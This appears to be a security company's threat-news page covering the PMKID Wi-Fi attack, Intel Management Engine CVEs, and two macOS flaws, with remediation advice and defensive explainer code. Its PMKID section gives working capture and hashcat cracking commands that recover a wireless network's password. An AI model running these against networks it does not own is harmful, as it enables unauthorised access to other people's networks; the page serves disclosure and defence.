Cyber Threat News

August

PMKID WPA/WPA2 Exploit

On routers with roaming enabled, the attack does not require capturing the 4-way handshake.

August 8 | Analysis: 3

PMKID Hack WPA/WPA2

Step 1 — An attacker can use tools like hcxdumptool (v4.2.0 or higher), among others, to request the PMKID from the targeted access point and dump the received frame.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Using the hcxpcaptool tool, the output of the frame (in pcapng format) can then be converted into a hash format accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Use the Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

The result is the target wireless network's password; cracking it may take time depending on its length and complexity.
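Why a single PMKID frame is enough: the PMKID depends only on the PMK (PBKDF2 of the passphrase and SSID) and the two MAC addresses, and of those only the passphrase is secret, so a captured PMKID can be checked offline against passphrase guesses, which is what hashcat mode 16800 does. The following is an added example, not code from the article or from the hcxtools/hashcat projects; the SSID, MAC addresses and passphrase are constructed values.

```python
import hashlib
import hmac

# Constructed sample values (not from the article): an SSID and the AP / client MACs.
SSID = "ExampleNet"
AP_MAC = "4604ba734d4e"
STA_MAC = "89acf0e761f4"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the only salt and the passphrase the only secret input."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> str:
    """802.11 PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC), as hex.
    No nonces from the 4-way handshake are involved, which is why one association
    frame carrying the PMKID is enough for offline verification."""
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16].hex()


def make_16800_line(pmkid: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """hashcat mode 16800 input line: PMKID*AP_MAC*STA_MAC*ESSID(hex)."""
    return f"{pmkid}*{ap_mac}*{sta_mac}*{ssid.encode().hex()}"


def parse_16800_line(line: str):
    """Split a mode 16800 line back into (pmkid, ap_mac, sta_mac, ssid)."""
    pmkid, ap_mac, sta_mac, essid_hex = line.strip().split("*")
    return pmkid, ap_mac, sta_mac, bytes.fromhex(essid_hex).decode()


def candidate_matches(line: str, passphrase: str) -> bool:
    """Recompute the PMKID for one passphrase guess and compare it to the captured one.
    Each guess costs one PBKDF2 run (4096 HMAC-SHA1 rounds), so the only practical
    defence for WPA2-Personal is passphrase length and randomness (or moving to WPA3)."""
    pmkid, ap_mac, sta_mac, ssid = parse_16800_line(line)
    guess = derive_pmkid(derive_pmk(passphrase, ssid), ap_mac, sta_mac)
    return hmac.compare_digest(guess, pmkid)


if __name__ == "__main__":
    pmkid = derive_pmkid(derive_pmk("correct horse battery", SSID), AP_MAC, STA_MAC)
    captured = make_16800_line(pmkid, AP_MAC, STA_MAC, SSID)
    print(captured)
    print(candidate_matches(captured, "correct horse battery"), candidate_matches(captured, "password1"))
```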

July


Intel Management Engine

Buffer Overflow & Memory Corruption

July 20 | Analysis: 4

Any overflow bug is a major issue, and quick remediation is recommended. Intel used two separate advisories to describe the four major exploitable bugs, which can allow arbitrary code to be run.

Affected products:

The issues affect Intel® Active Management Technology 3.x/4.x/5.x/6.x/7.x/8.x/9.x/10.x/11.x used in corporate PCs (Intel® vPro™, Intel® AMT), IoT devices, workstations and servers. These firmware versions may be found on certain products:

• Intel® Core™ 2 Duo vPro™ and Intel® Centrino™ 2 vPro™

• 1st, 2nd, 3rd, 4th, 5th, 6th, 7th, & 8th Generation Intel® Core™ Processor Family

• Intel® Xeon® Processor E3-1200 v5 & v6 Product Family (Greenlow)

• Intel® Xeon® Processor Scalable Family (Purley)

• Intel® Xeon® Processor W Family (Basin Falls)

CVE ID: CVE-2018-3628
CVE Title: Buffer overflow in HTTP handler in Intel® Active Management Technology in Intel Converged Security Manageability Engine Firmware 3.x, 4.x, 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, 11.x may allow an attacker to execute arbitrary code via the same subnet
CVSSv3 severity: 8.1 (High)
CVSSv3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2018-3629
CVE Title: Buffer overflow in event handler in Intel® Active Management Technology in Intel Converged Security Manageability Engine Firmware 3.x, 4.x, 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, 11.x may allow an attacker to cause a denial of service via the same subnet
CVSSv3 severity: 7.5 (High)
CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID: CVE-2018-3632
CVE Title: Memory corruption in Intel® Active Management Technology in Intel Converged Security Manageability Engine Firmware 6.x/7.x/8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 could be triggered by an attacker with local administrator permission on the system
CVSSv3 severity: 6.4 (Medium)
CVSSv3 Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Recommendations:

Intel recommends that end users check with their system manufacturers and apply any available updates as soon as practical, based on the versions listed below, or higher:

Associated CPU Generation: Resolved firmware version (or higher)
4th Generation Intel® Core™ Processor Family: Intel® CSME 9.1.43 / Intel® CSME 9.5.63
5th Generation Intel® Core™ Processor Family: Intel® CSME 10.0.57
6th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
7th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
8th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
Intel® Xeon® Processor E3-1200 v5 & v6 Product Family: Intel® CSME 11.8.50
Intel® Xeon® Processor Scalable Family: Intel® CSME 11.21.51
Intel® Xeon® Processor W Family: Intel® CSME 11.11.50

– The Intel® CSME firmware for the following products is no longer supported.  These products will not receive a firmware update: Intel® Core™ 2 Duo vPro™, Intel® Centrino™ 2 vPro™, 1st Generation Intel® Core™, 2nd Generation Intel® Core™, 3rd Generation Intel® Core™.

Acknowledgements:

CVE-2018-3628, CVE-2018-3629 and CVE-2018-3632 were discovered by Intel as part of continuously improving the robustness of the Intel® Converged Security Management Engine (Intel® CSME).

Source: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00112.html

In a second advisory related to the issue, Intel described a further bug, possibly found while the above CVEs were being written:

Affected products:

The issue affects Intel® CSME 11.x used in consumer/corporate PCs, IoT devices, and workstations. The affected firmware version may be found on these products:

• 6th, 7th, & 8th Generation Intel® Core™ Processor Family

• Intel® Xeon® Processor E3-1200 v5 & v6 Product Family (Greenlow)

• Intel® Xeon® Processor W Family (Basin Falls)

CVE ID: CVE-2018-3627
CVE Title: Logic bug in Intel® Converged Security Management Engine 11.x may allow an attacker to execute arbitrary code via local privileged access
CVSSv3 severity: 7.5 (High)
CVSSv3 Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Recommendations:

Intel recommends that end users check with their system manufacturers and apply any available updates as soon as practical, based on the versions listed below, or higher:

Associated CPU Generation: Resolved firmware version (or higher)
6th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
7th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
8th Generation Intel® Core™ Processor Family: Intel® CSME 11.8.50
Intel® Xeon® Processor E3-1200 v5 & v6 Product Family: Intel® CSME 11.8.50
Intel® Xeon® Processor W Family: Intel® CSME 11.11.50

Acknowledgements:

CVE-2018-3627 was discovered by Intel as part of continuously improving the robustness of the Intel® Converged Security Management Engine (Intel® CSME).

Source: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00118.html

June

Apple QuickLook Encryption

June 2018 | Analysis: 1-2

TLDR:

Image previews (such as thumbnails of screenshots containing sensitive data) are at the center of the latest security flaw uncovered affecting Apple. Researchers discovered that a key folder macOS uses for previewing files is not covered by the encryption of the drive the files live on.

Attack Vectors:

I found out that Quicklook registers the com.apple.quicklook.ThumbnailsAgent XPC service, which is responsible for creating the thumbnails database and storing it in the /var/folders/…/C/com.apple.QuickLook.thumbnailcache/ directory. It means that all photos that you have previewed using space (or that Quicklook cached independently) are stored in that directory as a miniature together with their path. They stay there even if you delete these files or if you previewed them on an encrypted HDD or in a TrueCrypt/VeraCrypt container.

Remediation:

Deleting the thumbnail cache folder is advised, by executing the following commands in Terminal:

rm -rf $TMPDIR/../C/com.apple.QuickLook.thumbnailcache

sudo reboot

Alternatively, this can be done without rebooting using:

qlmanage -r cache


Apple Code Signing Verification

June 2018 | Threat Analysis: 3

Background:

Exploitable since 2005, this recent discovery is an epic Apple security failure. macOS and OS X require code to be digitally signed in order to run; faking this signature is very simple and straightforward.

Attack Vector:

By setting the CPU type to an invalid type or to a valid but non-native CPU type (for example, PPC), the Mach-O loader skips over the validly signed Mach-O binary and executes the malicious (non-Apple-signed) code…

Proof of concept

Affected Vendors:

  • VirusTotal (CVE-2018-10408)
  • Google – Santa, molcodesignchecker (CVE-2018-10405)
  • Facebook – osquery (CVE-2018-6336)
  • Objective Development – Little Snitch (CVE-2018-10470)
  • F-Secure – xFence, also Little Flocker (CVE-2018-10403)
  • Objective-See – WhatsYourSign, ProcInfo, KnockKnock, LuLu, TaskExplorer & others (CVE-2018-10404)
  • Yelp – OSXCollector (CVE-2018-10406)
  • Carbon Black – Cb Response (CVE-2018-10407)

Remediation:

  • Mac users are advised to update and apply all necessary fixes to prevent malicious software from manipulating the signing process.
  • Security tools native to macOS are not affected. The vendors listed above were contacted, and patches can be found on their respective websites or by updating the software.
  • Developers are required to follow the code signing API guidelines; PoCs for testing are also available.
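The attack vector above depends on a fat (universal) Mach-O that pairs a validly signed slice with a slice of another CPU type; a verifier that stops after the first slice never sees the second. The following added example (not code from the article or from any of the vendors listed) parses a fat header and reports the slices such a check would skip: unknown CPU types and valid but non-native ones. The header bytes are constructed, and treating x86_64/arm64 as the native types is an assumption.

```python
import struct

FAT_MAGIC = 0xCAFEBABE  # fat (universal) Mach-O header magic, big-endian on disk
# Mach-O cpu_type_t values (mach/machine.h); bit 24 marks the 64-bit variant.
CPU_TYPE_NAMES = {0x00000007: "i386", 0x01000007: "x86_64", 0x0000000C: "arm",
                  0x0100000C: "arm64", 0x00000012: "ppc", 0x01000012: "ppc64"}
# Assumption: the hosts this check protects only run x86_64 or arm64 code.
NATIVE_CPU_TYPES = {0x01000007, 0x0100000C}

def parse_fat_slices(data: bytes):
    """Return [(cputype, offset, size), ...] for every slice listed in a fat header."""
    if len(data) < 8 or struct.unpack_from(">I", data, 0)[0] != FAT_MAGIC:
        raise ValueError("not a fat (universal) Mach-O")
    nfat_arch = struct.unpack_from(">I", data, 4)[0]
    slices = []
    for i in range(nfat_arch):
        # struct fat_arch: cputype, cpusubtype, offset, size, align (uint32 each, big-endian)
        cputype, _sub, offset, size, _align = struct.unpack_from(">IIIII", data, 8 + 20 * i)
        slices.append((cputype, offset, size))
    return slices

def audit_fat(data: bytes):
    """List the slices a first-slice-only signature check never looks at: unknown cputypes
    and valid but non-native ones (the PPC case above). Every slice must be verified."""
    findings = []
    for idx, (cputype, _offset, _size) in enumerate(parse_fat_slices(data)):
        name = CPU_TYPE_NAMES.get(cputype)
        if name is None:
            findings.append(f"slice {idx}: unknown cputype 0x{cputype:08x}")
        elif cputype not in NATIVE_CPU_TYPES:
            findings.append(f"slice {idx}: non-native cputype {name}")
    return findings

def build_sample_fat_header(slices):
    """Constructed test input: a fat header only (no slice bodies), enough for parsing."""
    out = struct.pack(">II", FAT_MAGIC, len(slices))
    for cputype, offset, size in slices:
        out += struct.pack(">IIIII", cputype, 0, offset, size, 12)
    return out

# Constructed sample: a native x86_64 slice followed by a PPC slice.
SAMPLE_FAT = build_sample_fat_header([(0x01000007, 4096, 100), (0x00000012, 8192, 100)])

if __name__ == "__main__":
    for finding in audit_fat(SAMPLE_FAT):
        print(finding)
```

On macOS itself the same concern is addressed at the API level: Apple's Security framework exposes the kSecCSCheckAllArchitectures flag so that code-signature validation covers every slice rather than only the first.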

 

Threat analysis measured 1-5

Root Down Digital